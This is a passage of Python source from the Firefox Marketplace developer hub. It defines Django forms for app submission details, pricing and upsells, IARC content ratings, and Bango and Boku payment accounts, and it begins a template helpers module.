        # Stamp the acceptance time and persist it.
        self.instance.read_dev_agreement = datetime.now()
        self.instance.save()
class DevNewsletterForm(happyforms.Form):
    """Devhub newsletter subscription form."""
    email = forms.EmailField(
        error_messages={'required':
                        _lazy(u'Please enter a valid email address.')},
        widget=forms.TextInput(attrs={'required': '',
                                      'placeholder':
                                      _lazy(u'Your email address')}))
    # 'H' = HTML mail, 'T' = plain text.
    email_format = forms.ChoiceField(
        widget=forms.RadioSelect(),
        choices=(('H', 'HTML'), ('T', _lazy(u'Text'))),
        initial='H')
    privacy = forms.BooleanField(
        error_messages={'required':
                        _lazy(u'You must agree to the Privacy Policy.')})
    country = forms.ChoiceField(label=_lazy(u'Country'))
    def __init__(self, locale, *args, **kw):
        # Country choices are localized via product_details and sorted by
        # their display name; default selection is the US.
        regions = product_details.get_regions(locale)
        regions = sorted(regions.iteritems(), key=lambda x: x[1])
        super(DevNewsletterForm, self).__init__(*args, **kw)
        self.fields['country'].choices = regions
        self.fields['country'].initial = 'us'
class AppFormTechnical(addons.forms.AddonFormBase):
    """Technical-details form: public stats plus a virtual `flash` flag
    that is stored on the app's latest file rather than the app."""
    flash = forms.BooleanField(required=False)
    class Meta:
        model = Addon
        fields = ('public_stats',)
    def __init__(self, *args, **kw):
        super(AppFormTechnical, self).__init__(*args, **kw)
        # Seed the virtual flag from the app's current value.
        self.initial['flash'] = self.instance.uses_flash
    def save(self, addon, commit=False):
        # NOTE(review): `addon` and `commit` are ignored here; the parent
        # save is always called with commit=True. Confirm callers expect
        # this before changing the signature.
        uses_flash = self.cleaned_data.get('flash')
        self.instance = super(AppFormTechnical, self).save(commit=True)
        # Persist the flash flag on the latest file, if there is one.
        af = self.instance.get_latest_file()
        if af is not None:
            af.update(uses_flash=bool(uses_flash))
        return self.instance
class TransactionFilterForm(happyforms.Form):
    """Filters a developer's transaction listing by app, transaction type,
    transaction id and date range."""
    app = AddonChoiceField(queryset=None, required=False, label=_lazy(u'App'))
    transaction_type = forms.ChoiceField(
        required=False, label=_lazy(u'Transaction Type'),
        choices=[(None, '')] + amo.MKT_TRANSACTION_CONTRIB_TYPES.items())
    transaction_id = forms.CharField(
        required=False, label=_lazy(u'Transaction ID'))
    # Year choices for the date widgets: current year down to 2013
    # (range(current_year - 2012) yields offsets 0..current_year-2013).
    current_year = datetime.today().year
    years = [current_year - x for x in range(current_year - 2012)]
    date_from = forms.DateTimeField(
        required=False, widget=SelectDateWidget(years=years),
        label=_lazy(u'From'))
    date_to = forms.DateTimeField(
        required=False, widget=SelectDateWidget(years=years),
        label=_lazy(u'To'))
    def __init__(self, *args, **kwargs):
        # `apps` restricts the app dropdown, e.g. to the user's own apps.
        self.apps = kwargs.pop('apps', [])
        super(TransactionFilterForm, self).__init__(*args, **kwargs)
        self.fields['app'].queryset = self.apps
class APIConsumerForm(happyforms.ModelForm):
    """Creates/edits an API Access record (app name plus redirect URI)."""
    app_name = forms.CharField(required=True)
    # Stored as a CharField but must parse as a URL.
    redirect_uri = forms.CharField(validators=[URLValidator()],
                                   required=True)
    class Meta:
        model = Access
        fields = ('app_name', 'redirect_uri')
class AppVersionForm(happyforms.ModelForm):
    """Edits a version's release/approval notes and, for pending
    versions, whether the app is published immediately on approval."""
    releasenotes = TransField(widget=TransTextarea(), required=False)
    approvalnotes = forms.CharField(
        widget=TranslationTextarea(attrs={'rows': 4}), required=False)
    publish_immediately = forms.BooleanField(required=False)
    class Meta:
        model = Version
        fields = ('releasenotes', 'approvalnotes')
    def __init__(self, *args, **kwargs):
        super(AppVersionForm, self).__init__(*args, **kwargs)
        immediate = self.instance.addon.make_public == amo.PUBLIC_IMMEDIATELY
        self.fields['publish_immediately'].initial = immediate
    def save(self, *args, **kwargs):
        saved = super(AppVersionForm, self).save(*args, **kwargs)
        # make_public lives on the app, not the version, and may only be
        # changed while the version is still pending review.
        if self.instance.all_files[0].status == amo.STATUS_PENDING:
            publish = self.cleaned_data.get('publish_immediately')
            self.instance.addon.update(
                make_public=(amo.PUBLIC_IMMEDIATELY if publish
                             else amo.PUBLIC_WAIT))
        return saved
class PreloadTestPlanForm(happyforms.Form):
    """Submission form for the pre-load program: an agreement checkbox
    plus an uploaded test-plan document."""
    agree = forms.BooleanField(
        widget=forms.CheckboxInput,
        label=_lazy(
            u'Please consider my app as a candidate to be pre-loaded on a '
            u'Firefox OS device. I agree to the terms and conditions outlined '
            u'above. I understand that this document is not a commitment to '
            u'pre-load my app.'
        ))
    test_plan = forms.FileField(
        label=_lazy(u'Upload Your Test Plan (.pdf, .xls under 2.5MB)'),
        widget=forms.FileInput(attrs={'class': 'button'}))
    def clean(self):
        """Validate the uploaded test_plan's content type and size."""
        content_types = ['application/pdf', 'application/vnd.ms-excel']
        max_upload_size = 2621440  # 2.5MB
        if 'test_plan' not in self.files:
            raise forms.ValidationError(_('Test plan required.'))
        plan_file = self.files['test_plan']
        # Reject anything that is not a PDF or Excel document.
        if plan_file.content_type not in content_types:
            msg = (_('Invalid file type. Only %s files are supported.') %
                   ', '.join(content_types))
            self._errors['test_plan'] = self.error_class([msg])
            raise forms.ValidationError(msg)
        # Enforce the 2.5MB size cap.
        if plan_file._size > max_upload_size:
            msg = _('File too large. Keep size under %s. Current size %s.')
            msg = msg % (filesizeformat(max_upload_size),
                         filesizeformat(plan_file._size))
            self._errors['test_plan'] = self.error_class([msg])
            raise forms.ValidationError(msg)
        return self.cleaned_data
class IARCGetAppInfoForm(happyforms.Form):
    """Fetches an existing IARC content rating for an app given the
    submission id and security code the developer got from the IARC tool,
    then stores the rating data on the app."""
    submission_id = forms.CharField()
    security_code = forms.CharField(max_length=10)
    def __init__(self, app, *args, **kwargs):
        # The app the fetched rating will be attached to.
        self.app = app
        super(IARCGetAppInfoForm, self).__init__(*args, **kwargs)
    def clean_submission_id(self):
        submission_id = (
            # Also allow "subm-1234" since that's what IARC tool displays.
            self.cleaned_data['submission_id'].lower().replace('subm-', ''))
        if submission_id.isdigit():
            return int(submission_id)
        raise forms.ValidationError(_('Please enter a valid submission ID.'))
    def clean(self):
        cleaned_data = super(IARCGetAppInfoForm, self).clean()
        app = self.app
        iarc_id = cleaned_data.get('submission_id')
        if not app or not iarc_id:
            return cleaned_data
        # Unless explicitly allowed by settings, a certificate may only be
        # attached to a single app.
        if (not settings.IARC_ALLOW_CERT_REUSE and
            IARCInfo.objects.filter(submission_id=iarc_id)
                            .exclude(addon=app).exists()):
            del cleaned_data['submission_id']
            raise forms.ValidationError(
                _('This IARC certificate is already being used for another '
                  'app. Please create a new IARC Ratings Certificate.'))
        return cleaned_data
    def save(self, *args, **kwargs):
        # NOTE(review): save() talks to the IARC web service and raises
        # ValidationError on a bad id/code, unlike a typical form save.
        app = self.app
        iarc_id = self.cleaned_data['submission_id']
        iarc_code = self.cleaned_data['security_code']
        # Generate XML.
        xml = lib.iarc.utils.render_xml(
            'get_app_info.xml',
            {'submission_id': iarc_id, 'security_code': iarc_code})
        # Process that shizzle.
        client = lib.iarc.client.get_iarc_client('services')
        resp = client.Get_App_Info(XMLString=xml)
        # Handle response.
        data = lib.iarc.utils.IARC_XML_Parser().parse_string(resp)
        if data.get('rows'):
            row = data['rows'][0]
            if 'submission_id' not in row:
                # [{'ActionStatus': 'No records found. Please try another
                # 'criteria.', 'rowId: 1}].
                msg = _('Invalid submission ID or security code.')
                self._errors['submission_id'] = self.error_class([msg])
                log.info('[IARC] Bad GetAppInfo: %s' % row)
                raise forms.ValidationError(msg)
            # We found a rating, so store the id and code for future use.
            app.set_iarc_info(iarc_id, iarc_code)
            app.set_descriptors(row.get('descriptors', []))
            app.set_interactives(row.get('interactives', []))
            app.set_content_ratings(row.get('ratings', {}))
        else:
            msg = _('Invalid submission ID or security code.')
            self._errors['submission_id'] = self.error_class([msg])
            log.info('[IARC] Bad GetAppInfo. No rows: %s' % data)
            raise forms.ValidationError(msg)
class ContentRatingForm(happyforms.Form):
    """Form with a single required `since` datetime field."""
    since = forms.DateTimeField()
########NEW FILE########
__FILENAME__ = forms_payments
from decimal import Decimal
from django import forms
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db.models import Q
from django.forms.formsets import formset_factory, BaseFormSet
import commonware
import happyforms
from curling.lib import HttpClientError
from tower import ugettext as _, ugettext_lazy as _lazy
import amo
from amo.utils import raise_required
from addons.models import Addon, AddonUpsell
from constants.payments import (PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
PAYMENT_METHOD_OPERATOR)
from editors.models import RereviewQueue
from lib.pay_server import client
from mkt.api.forms import SluggableModelChoiceField
from mkt.constants import (BANGO_COUNTRIES, BANGO_OUTPAYMENT_CURRENCIES,
FREE_PLATFORMS, PAID_PLATFORMS)
from mkt.developers.models import AddonPaymentAccount, PaymentAccount
from mkt.site.forms import AddonChoiceField
from mkt.submit.forms import DeviceTypeForm
from mkt.prices.models import AddonPremium, Price
log = commonware.log.getLogger('z.devhub')
def _restore_app_status(app, save=True):
    """
    Restore an incomplete app to its former status. The app will be marked
    as its previous status or PENDING if it was never reviewed.
    """
    log.info('Changing app from incomplete to previous status: %d' % app.pk)
    if app.highest_status != amo.STATUS_NULL:
        app.status = app.highest_status
    else:
        # Never reviewed: fall back to pending.
        app.status = amo.STATUS_PENDING
    if save:
        app.save()
class PremiumForm(DeviceTypeForm, happyforms.Form):
    """
    The premium details for an addon, which is unfortunately
    distributed across a few models.
    """
    # This does a nice Yes/No field like the mockup calls for.
    allow_inapp = forms.ChoiceField(
        choices=((True, _lazy(u'Yes')), (False, _lazy(u'No'))),
        widget=forms.RadioSelect, required=False)
    # Choices are provided at init by group_tier_choices.
    price = forms.ChoiceField(choices=(), label=_lazy(u'App Price'),
                              required=False)
    def __init__(self, *args, **kw):
        self.request = kw.pop('request')
        self.addon = kw.pop('addon')
        self.user = kw.pop('user')
        is_packaged = self.addon.is_packaged
        kw['initial'] = {
            'allow_inapp': self.addon.premium_type in amo.ADDON_INAPPS
        }
        # Initial price: the literal string 'free' marks free-with-in-app.
        if self.addon.premium_type == amo.ADDON_FREE_INAPP:
            kw['initial']['price'] = 'free'
        elif self.addon.premium and self.addon.premium.price:
            # If the app has a premium object, set the initial price.
            kw['initial']['price'] = self.addon.premium.price.pk
        super(PremiumForm, self).__init__(*args, **kw)
        self.fields['paid_platforms'].choices = PAID_PLATFORMS(self.request,
                                                               is_packaged)
        self.fields['free_platforms'].choices = FREE_PLATFORMS(self.request,
                                                               is_packaged)
        if (self.is_paid() and not self.is_toggling()):
            # Require the price field if the app is premium and
            # we're not toggling from free <-> paid.
            self.fields['price'].required = True
        # Get the list of supported devices and put them in the data.
        self.device_data = {}
        supported_devices = [amo.REVERSE_DEVICE_LOOKUP[dev.id] for dev in
                             self.addon.device_types]
        self.initial.setdefault('free_platforms', [])
        self.initial.setdefault('paid_platforms', [])
        # Platform choice values look like 'free-<platform>' /
        # 'paid-<platform>'; split off the platform suffix.
        for platform in set(x[0].split('-', 1)[1] for x in
                            (FREE_PLATFORMS(self.request, is_packaged) +
                             PAID_PLATFORMS(self.request, is_packaged))):
            supported = platform in supported_devices
            self.device_data['free-%s' % platform] = supported
            self.device_data['paid-%s' % platform] = supported
            if supported:
                self.initial['free_platforms'].append('free-%s' % platform)
                self.initial['paid_platforms'].append('paid-%s' % platform)
        if not self.initial.get('price'):
            self.initial['price'] = self._initial_price_id()
        self.fields['price'].choices = self.group_tier_choices()
    def group_tier_choices(self):
        """Creates tier choices with optgroups based on payment methods"""
        price_choices = [
            ('free', _('Free (with in-app payments)')),
        ]
        card_billed = []
        operator_billed = []
        card_and_operator_billed = []
        for price in Price.objects.active():
            choice = (price.pk, unicode(price))
            # Special case price tier 0.
            if price.price == Decimal('0.00'):
                price_choices.append((price.pk, '%s (%s)' %
                                     (unicode(price),
                                      _('Promotional Pricing'))))
            # Tiers that can only be operator billed.
            elif price.method == PAYMENT_METHOD_OPERATOR:
                operator_billed.append(choice)
            # Tiers that can only be card billed.
            elif price.method == PAYMENT_METHOD_CARD:
                card_billed.append(choice)
            # Tiers that are can generally be billed by either
            # operator or card.
            elif price.method == PAYMENT_METHOD_ALL:
                card_and_operator_billed.append(choice)
        if operator_billed:
            price_choices.append((_lazy('Only supports carrier billing'),
                                  operator_billed))
        if card_billed:
            price_choices.append((_lazy('Only supports credit-card billing'),
                                  card_billed))
        if card_and_operator_billed:
            price_choices.append(
                (_lazy('Supports all billing methods'),
                 card_and_operator_billed))
        return price_choices
    def _initial_price_id(self):
        """Sets the inital price tier if available."""
        try:
            return Price.objects.active().get(price='0.99').id
        except Price.DoesNotExist:
            log.warning('Could not find a price tier 0.99 to set as default.')
            return None
    def _make_premium(self):
        """Return the app's AddonPremium, creating an unsaved one at the
        default price tier if none exists yet."""
        if self.addon.premium:
            return self.addon.premium
        log.info('New AddonPremium object for addon %s' % self.addon.pk)
        self.addon._premium = AddonPremium(addon=self.addon,
                                           price_id=self._initial_price_id())
        return self.addon._premium
    def is_paid(self):
        # True for premium apps and for free apps with in-app payments.
        is_paid = (self.addon.premium_type in amo.ADDON_PREMIUMS
                   or self.is_free_inapp())
        return is_paid
    def is_free_inapp(self):
        return self.addon.premium_type == amo.ADDON_FREE_INAPP
    def is_toggling(self):
        # 'free'/'paid' when this POST is a free<->paid toggle, else False.
        value = self.request.POST.get('toggle-paid')
        return value if value in ('free', 'paid') else False
    def clean(self):
        is_toggling = self.is_toggling()
        if self.addon.is_packaged:
            self._set_packaged_errors()
            if self._errors.get('free_platforms'):
                return self.cleaned_data
        if not is_toggling:
            # If a platform wasn't selected, raise an error.
            if not self.cleaned_data[
                '%s_platforms' % ('paid' if self.is_paid() else 'free')]:
                self._add_error('none')
                # We want to throw out the user's selections in this case and
                # not update the <select> element that goes along with this.
                # I.e.: we don't want to re-populate these big chunky
                # checkboxes with bad data.
                # Also, I'm so, so sorry.
                self.data = dict(self.data)
                platforms = dict(
                    free_platforms=self.initial.get('free_platforms', []),
                    paid_platforms=self.initial.get('paid_platforms', []))
                self.data.update(**platforms)
        return self.cleaned_data
    def clean_price(self):
        price_value = self.cleaned_data.get('price')
        premium_type = self.cleaned_data.get('premium_type')
        if ((premium_type in amo.ADDON_PREMIUMS
             or premium_type == amo.ADDON_FREE_INAPP)
            and not price_value and not self.is_toggling()):
            raise_required()
        if not price_value and self.fields['price'].required is False:
            return None
        # Special case for a free app - in-app payments must be enabled.
        # Note: this isn't enforced for tier zero apps.
        if price_value == 'free':
            if self.cleaned_data.get('allow_inapp') != 'True':
                raise ValidationError(_('If app is Free, '
                                        'in-app payments must be enabled'))
            return price_value
        try:
            price = Price.objects.get(pk=price_value, active=True)
        except (ValueError, Price.DoesNotExist):
            raise ValidationError(_('Not a valid choice'))
        return price
    def save(self):
        toggle = self.is_toggling()
        upsell = self.addon.upsold
        # is_paid is true for both premium apps and free apps with
        # in-app payments.
        is_paid = self.is_paid()
        if toggle == 'paid' and self.addon.premium_type == amo.ADDON_FREE:
            # Toggle free apps to paid by giving them a premium object.
            premium = self._make_premium()
            premium.price_id = self._initial_price_id()
            premium.save()
            self.addon.premium_type = amo.ADDON_PREMIUM
            self.addon.status = amo.STATUS_NULL
            is_paid = True
        elif toggle == 'free' and is_paid:
            # If the app is paid and we're making it free, remove it as an
            # upsell (if an upsell exists).
            upsell = self.addon.upsold
            if upsell:
                log.debug('[1@%s] Removing upsell; switching to free' %
                          self.addon.pk)
                upsell.delete()
            log.debug('[1@%s] Removing app payment account' % self.addon.pk)
            AddonPaymentAccount.objects.filter(addon=self.addon).delete()
            log.debug('[1@%s] Setting app premium_type to FREE' %
                      self.addon.pk)
            self.addon.premium_type = amo.ADDON_FREE
            # Remove addonpremium
            try:
                log.debug('[1@%s] Removing addon premium' % self.addon.pk)
                self.addon.addonpremium.delete()
            except AddonPremium.DoesNotExist:
                pass
            if (self.addon.has_incomplete_status() and
                self.addon.is_fully_complete()):
                _restore_app_status(self.addon, save=False)
            is_paid = False
        # Right is_paid is both paid apps and free with in-app payments.
        elif is_paid:
            price = self.cleaned_data.get('price')
            # If price is free then we want to make this an app that's
            # free with in-app payments.
            if price == 'free':
                self.addon.premium_type = amo.ADDON_FREE_INAPP
                log.debug('[1@%s] Changing to free with in_app'
                          % self.addon.pk)
                # Remove upsell
                upsell = self.addon.upsold
                if upsell:
                    log.debug('[1@%s] Removing upsell; switching to free '
                              'with in_app' % self.addon.pk)
                    upsell.delete()
                # Remove addonpremium
                try:
                    log.debug('[1@%s] Removing addon premium' % self.addon.pk)
                    self.addon.addonpremium.delete()
                except AddonPremium.DoesNotExist:
                    pass
            else:
                # The dev is submitting updates for payment data about a paid
                # app. This might also happen if he/she is associating a new
                # paid app with an existing bank account.
                premium = self._make_premium()
                self.addon.premium_type = (
                    amo.ADDON_PREMIUM_INAPP if
                    self.cleaned_data.get('allow_inapp') == 'True' else
                    amo.ADDON_PREMIUM)
                if price and price != 'free':
                    log.debug('[1@%s] Updating app price (%s)' %
                              (self.addon.pk, self.cleaned_data['price']))
                    premium.price = self.cleaned_data['price']
                premium.save()
        if not toggle:
            # Save the device compatibility information when we're not
            # toggling.
            super(PremiumForm, self).save(self.addon, is_paid)
        log.info('Saving app payment changes for addon %s.' % self.addon.pk)
        self.addon.save()
class UpsellForm(happyforms.Form):
    """Links a paid app to the free app it is a paid upgrade of."""
    upsell_of = AddonChoiceField(queryset=Addon.objects.none(), required=False,
                                 label=_lazy(u'This is a paid upgrade of'),
                                 empty_label=_lazy(u'Not an upgrade'))
    def __init__(self, *args, **kw):
        self.addon = kw.pop('addon')
        self.user = kw.pop('user')
        kw.setdefault('initial', {})
        if self.addon.upsold:
            kw['initial']['upsell_of'] = self.addon.upsold.free
        super(UpsellForm, self).__init__(*args, **kw)
        # Only this user's free apps of the same type are valid targets.
        self.fields['upsell_of'].queryset = (
            self.user.addons.exclude(pk=self.addon.pk,
                                     status=amo.STATUS_DELETED)
            .filter(premium_type__in=amo.ADDON_FREES,
                    type=self.addon.type))
    def save(self):
        existing = self.addon.upsold
        chosen_free_app = self.cleaned_data.get('upsell_of')
        if chosen_free_app:
            # Point the (new or existing) upsell at the chosen free app.
            upsell = existing
            if not upsell:
                log.debug('[1@%s] Creating app upsell' % self.addon.pk)
                upsell = AddonUpsell(premium=self.addon)
            upsell.free = chosen_free_app
            upsell.save()
        elif existing:
            # Nothing selected: drop the existing upsell link.
            log.debug('[1@%s] Deleting the app upsell' % self.addon.pk)
            existing.delete()
class BangoPaymentAccountForm(happyforms.Form):
    """Collects the company, contact and bank details Bango needs for a
    payment account. Field names use Bango's camelCase API parameter
    names on purpose."""
    bankAccountPayeeName = forms.CharField(
        max_length=50, label=_lazy(u'Account Holder Name'))
    companyName = forms.CharField(
        max_length=255, label=_lazy(u'Company Name'))
    vendorName = forms.CharField(
        max_length=255, label=_lazy(u'Vendor Name'))
    financeEmailAddress = forms.EmailField(
        required=True, label=_lazy(u'Financial Email'),
        max_length=100)
    adminEmailAddress = forms.EmailField(
        required=True, label=_lazy(u'Administrative Email'),
        max_length=100)
    supportEmailAddress = forms.EmailField(
        required=True, label=_lazy(u'Support Email'),
        max_length=100)
    address1 = forms.CharField(
        max_length=255, label=_lazy(u'Address'))
    address2 = forms.CharField(
        max_length=255, required=False, label=_lazy(u'Address 2'))
    addressCity = forms.CharField(
        max_length=128, label=_lazy(u'City/Municipality'))
    addressState = forms.CharField(
        max_length=64, label=_lazy(u'State/Province/Region'))
    addressZipCode = forms.CharField(
        max_length=10, label=_lazy(u'Zip/Postal Code'))
    addressPhone = forms.CharField(
        max_length=20, label=_lazy(u'Phone'))
    countryIso = forms.ChoiceField(
        choices=BANGO_COUNTRIES, label=_lazy(u'Country'))
    currencyIso = forms.ChoiceField(
        choices=BANGO_OUTPAYMENT_CURRENCIES,
        label=_lazy(u'I prefer to be paid in'))
    vatNumber = forms.CharField(
        max_length=17, required=False, label=_lazy(u'VAT Number'))
    bankAccountNumber = forms.CharField(
        max_length=20, label=_lazy(u'Bank Account Number'))
    bankAccountCode = forms.CharField(
        # l10n: SWIFT is http://bit.ly/15e7RJx and might not need translating.
        max_length=20, label=_lazy(u'SWIFT code'))
    bankName = forms.CharField(
        max_length=50, label=_lazy(u'Bank Name'))
    bankAddress1 = forms.CharField(
        max_length=50, label=_lazy(u'Bank Address'))
    bankAddress2 = forms.CharField(
        max_length=50, required=False, label=_lazy(u'Bank Address 2'))
    bankAddressCity = forms.CharField(
        max_length=50, required=False, label=_lazy(u'Bank City/Municipality'))
    bankAddressState = forms.CharField(
        max_length=50, required=False,
        label=_lazy(u'Bank State/Province/Region'))
    bankAddressZipCode = forms.CharField(
        max_length=10, label=_lazy(u'Bank Zip/Postal Code'))
    bankAddressIso = forms.ChoiceField(
        choices=BANGO_COUNTRIES, label=_lazy(u'Bank Country'))
    account_name = forms.CharField(max_length=64, label=_lazy(u'Account Name'))
    # These are the fields that Bango uses for bank details. They're read-only
    # once written.
    read_only_fields = set(['bankAccountPayeeName', 'bankAccountNumber',
                            'bankAccountCode', 'bankName', 'bankAddress1',
                            'bankAddressZipCode', 'bankAddressIso',
                            'adminEmailAddress', 'currencyIso',
                            'companyName'])
    def __init__(self, *args, **kwargs):
        # When editing an existing account, the read-only bank fields are
        # made optional since they can no longer be changed.
        self.account = kwargs.pop('account', None)
        super(BangoPaymentAccountForm, self).__init__(*args, **kwargs)
        if self.account:
            # We don't need the bank account fields if we're getting
            # modifications.
            for field in self.fields:
                if field in self.read_only_fields:
                    self.fields[field].required = False
    def save(self):
        # Save the account name, if it was updated.
        self.account.get_provider().account_update(self.account,
                                                   self.cleaned_data)
class AccountListForm(happyforms.Form):
    """Lets an app owner pick which payment account (for one provider) an
    app is linked to, handling shared accounts and non-owner viewers."""
    accounts = forms.ModelChoiceField(
        queryset=PaymentAccount.objects.none(),
        label=_lazy(u'Payment Account'), required=False)
    def __init__(self, *args, **kwargs):
        self.addon = kwargs.pop('addon')
        self.provider = kwargs.pop('provider')
        self.user = kwargs.pop('user')
        super(AccountListForm, self).__init__(*args, **kwargs)
        # Only app owners may change the selected account; the field is
        # disabled for other roles.
        self.is_owner = None
        if self.addon:
            self.is_owner = self.addon.authors.filter(pk=self.user.pk,
                addonuser__role=amo.AUTHOR_ROLE_OWNER).exists()
        self.fields['accounts'].queryset = self.agreed_payment_accounts
        if self.is_owner is False:
            self.fields['accounts'].widget.attrs['disabled'] = ''
        self.current_payment_account = None
        try:
            current_acct = AddonPaymentAccount.objects.get(
                addon=self.addon,
                payment_account__provider=self.provider.provider)
            payment_account = PaymentAccount.objects.get(
                uri=current_acct.account_uri)
            # If this user owns this account then set initial otherwise
            # we'll stash it on the form so we can display the non-owned
            # current account separately.
            if payment_account.user.pk == self.user.pk:
                self.initial['accounts'] = payment_account
                self.fields['accounts'].empty_label = None
            else:
                self.current_payment_account = payment_account
        except (AddonPaymentAccount.DoesNotExist, PaymentAccount.DoesNotExist):
            pass
    @property
    def payment_accounts(self):
        """Active accounts visible to this user (own or shared), limited
        to this form's provider when one is set."""
        queryset = (PaymentAccount.objects
                    .filter(inactive=False)
                    .filter(Q(user=self.user) | Q(shared=True))
                    .order_by('name', 'shared'))
        if self.provider is not None:
            queryset = queryset.filter(provider=self.provider.provider)
        return queryset
    @property
    def agreed_payment_accounts(self):
        """Visible accounts whose terms of service were accepted."""
        return self.payment_accounts.filter(agreed_tos=True)
    def has_accounts(self):
        """True if the user can see any account for this provider."""
        return self.payment_accounts.exists()
    def has_completed_accounts(self):
        """True if any visible account has agreed to the ToS."""
        return self.agreed_payment_accounts.exists()
    def clean_accounts(self):
        accounts = self.cleaned_data.get('accounts')
        # When cleaned if the accounts field wasn't submitted or it's an empty
        # string the cleaned value will be None for a ModelChoiceField.
        # Therefore to tell the difference between the non-submission and the
        # empty string we need to check the raw data.
        accounts_submitted = 'accounts' in self.data
        if (AddonPaymentAccount.objects.filter(addon=self.addon).exists() and
                accounts_submitted and not accounts):
            raise forms.ValidationError(
                _('You cannot remove a payment account from an app.'))
        if accounts and not self.is_owner:
            raise forms.ValidationError(
                _('You are not permitted to change payment accounts.'))
        return accounts
    def save(self):
        if self.cleaned_data.get('accounts'):
            # Replace any existing link for this provider with the new one.
            try:
                log.info('[1@%s] Deleting app payment account' % self.addon.pk)
                AddonPaymentAccount.objects.get(
                    addon=self.addon,
                    payment_account__provider=self.provider.provider
                ).delete()
            except AddonPaymentAccount.DoesNotExist:
                pass
            log.info('[1@%s] Creating new app payment account' % self.addon.pk)
            account = self.cleaned_data['accounts']
            uri = self.provider.product_create(account, self.addon)
            AddonPaymentAccount.objects.create(
                addon=self.addon, account_uri=account.uri,
                payment_account=account, product_uri=uri)
            # If the app is marked as paid and the information is complete
            # and the app is currently marked as incomplete, put it into the
            # re-review queue.
            if (self.addon.status == amo.STATUS_NULL and
                    self.addon.highest_status in amo.WEBAPPS_APPROVED_STATUSES):
                # FIXME: This might cause noise in the future if bank accounts
                # get manually closed by Bango and we mark apps as STATUS_NULL
                # until a new account is selected. That will trigger a
                # re-review.
                log.info(u'[Webapp:%s] (Re-review) Public app, premium type '
                         u'upgraded.' % self.addon)
                RereviewQueue.flag(
                    self.addon, amo.LOG.REREVIEW_PREMIUM_TYPE_UPGRADE)
            if (self.addon.has_incomplete_status() and
                    self.addon.is_fully_complete()):
                _restore_app_status(self.addon)
class AccountListBaseFormSet(BaseFormSet):
    """Base FormSet for AccountListForm. Provide the extra data for the
    AccountListForm as a list in `provider_data`.
    Example:
        formset = AccountListFormSet(provider_data=[
            {'provider': Bango()}, {'provider': Boku()}])
    """
    def __init__(self, **kwargs):
        self.provider_data = kwargs.pop('provider_data', [])
        super(AccountListBaseFormSet, self).__init__(**kwargs)
    def _construct_form(self, i, **kwargs):
        # Seed each member form with the matching provider_data entry.
        try:
            form_kwargs = self.provider_data[i]
        except IndexError:
            form_kwargs = {}
        form_kwargs.update(kwargs)
        parent = super(AccountListBaseFormSet, self)
        return parent._construct_form(i, **form_kwargs)
    def save(self):
        # Persist every member form.
        for member in self.forms:
            member.save()
# Wrap the formset_factory call in a function so that extra/max_num works with
# different values of settings.PAYMENT_PROVIDERS in the tests.
def AccountListFormSet(*args, **kwargs):
    """Build and instantiate an AccountListForm formset, one form per
    configured payment provider."""
    n_providers = len(settings.PAYMENT_PROVIDERS)
    formset_cls = formset_factory(AccountListForm,
                                  formset=AccountListBaseFormSet,
                                  extra=n_providers,
                                  max_num=n_providers)
    return formset_cls(*args, **kwargs)
class ReferenceAccountForm(happyforms.Form):
    """Edits the details of a reference payment account."""
    uuid = forms.CharField(max_length=36, required=False,
                           widget=forms.HiddenInput())
    account_name = forms.CharField(max_length=50, label=_lazy(u'Account name'))
    name = forms.CharField(max_length=50, label=_lazy(u'Name'))
    email = forms.CharField(max_length=50, label=_lazy(u'Email'))
    def __init__(self, *args, **kwargs):
        self.account = kwargs.pop('account', None)
        super(ReferenceAccountForm, self).__init__(*args, **kwargs)
    def save(self):
        # Push the (possibly updated) details to the account's provider.
        self.account.get_provider().account_update(self.account,
                                                   self.cleaned_data)
class BokuAccountForm(happyforms.Form):
    """Signup form for a Boku payment account."""
    signup_url = settings.BOKU_SIGNUP_URL
    account_name = forms.CharField(max_length=50, label=_lazy(u'Account name'))
    # The lengths of these are not specified in the Boku documentation, so
    # making a guess here about max lengths.
    service_id = forms.CharField(max_length=50, label=_lazy(u'Service ID'))

    def clean_service_id(self):
        # Ask Solitude's Boku proxy to verify the service id.
        service_id = self.cleaned_data['service_id']
        try:
            client.api.boku.verify_service.post({'service_id': service_id})
        except HttpClientError:
            raise ValidationError(_('Service ID is not valid'))
        return service_id
class PaymentCheckForm(happyforms.Form):
    """Look up a paid webapp by slug for a payment-status check."""
    app = SluggableModelChoiceField(
        queryset=Addon.objects.filter(
            premium_type__in=amo.ADDON_HAS_PAYMENTS,
            type=amo.ADDON_WEBAPP),
        sluggable_to_field_name='app_slug')

    def clean_app(self):
        # The app must already have a payment account configured.
        app = self.cleaned_data['app']
        if app.has_payment_account():
            return app
        raise ValidationError(_('No payment account set up for that app'))
########NEW FILE########
__FILENAME__ = helpers
import datetime
import urllib
from collections import defaultdict
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_unicode
import chardet
import jinja2
from jingo import register
from jingo.helpers import datetime as jingo_datetime
from tower import ugettext as _, ungettext as ngettext
import amo
from access import acl
from addons.helpers import new_context
from mkt.site.helpers import mkt_breadcrumbs
# Expose acl.check_addon_ownership to templates as a jingo global function.
register.function(acl.check_addon_ownership)
@register.inclusion_tag('developers/apps/listing/items.html')
@jinja2.contextfunction
def hub_addon_listing_items(context, addons, src=None, notes=None):
    # Render the developer-hub app listing items template.
    # new_context(**locals()) forwards every argument (context, addons,
    # src, notes) into the template context by name — do not rename args.
    return new_context(**locals())
@register.function
@jinja2.contextfunction
def hub_page_title(context, title=None, addon=None):
    """Wrapper for developer page titles."""
    if addon:
        full_title = u'%s | %s' % (title, addon.name)
    else:
        devhub = _('Developers')
        if title:
            full_title = '%s | %s' % (title, devhub)
        else:
            full_title = devhub
    return mkt_page_title(context, full_title)
@register.function
@jinja2.contextfunction
def mkt_page_title(context, title, force_webapps=False):
    """Append the Marketplace site name to *title*."""
    return u'%s | %s' % (smart_unicode(title), _('Firefox Marketplace'))
@register.function
@jinja2.contextfunction
def hub_breadcrumbs(context, addon=None, items=None, add_default=False):
    """
    Wrapper function for ``breadcrumbs``. Prepends 'Developers' breadcrumb.
    **items**
        list of [(url, label)] to be inserted after Add-on.
    **addon**
        Adds the Add-on name to the end of the trail. If items are
        specified then the Add-on will be linked.
    **add_default**
        Prepends trail back to home when True. Default is False.
    **impala**
        Whether to use the impala_breadcrumbs helper. Default is False.
    """
